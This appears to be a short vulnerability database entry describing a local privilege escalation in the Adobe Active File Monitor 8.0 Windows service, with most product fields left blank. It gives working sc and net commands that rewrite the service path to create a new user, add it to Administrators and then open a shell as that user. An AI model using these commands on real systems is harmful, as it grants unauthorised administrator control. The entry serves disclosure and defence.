vendor:
by:
7.5
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Local Privilege Escalation
To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add" sc start "AdobeActiveFileMonitor8.0" runas /noprofile /user:%COMPUTERNAME%adobe cmd
Mitigation:
To mitigate this vulnerability, restrict local access to trusted users only. Ensure that the affected computer is physically secured to prevent unauthorized access.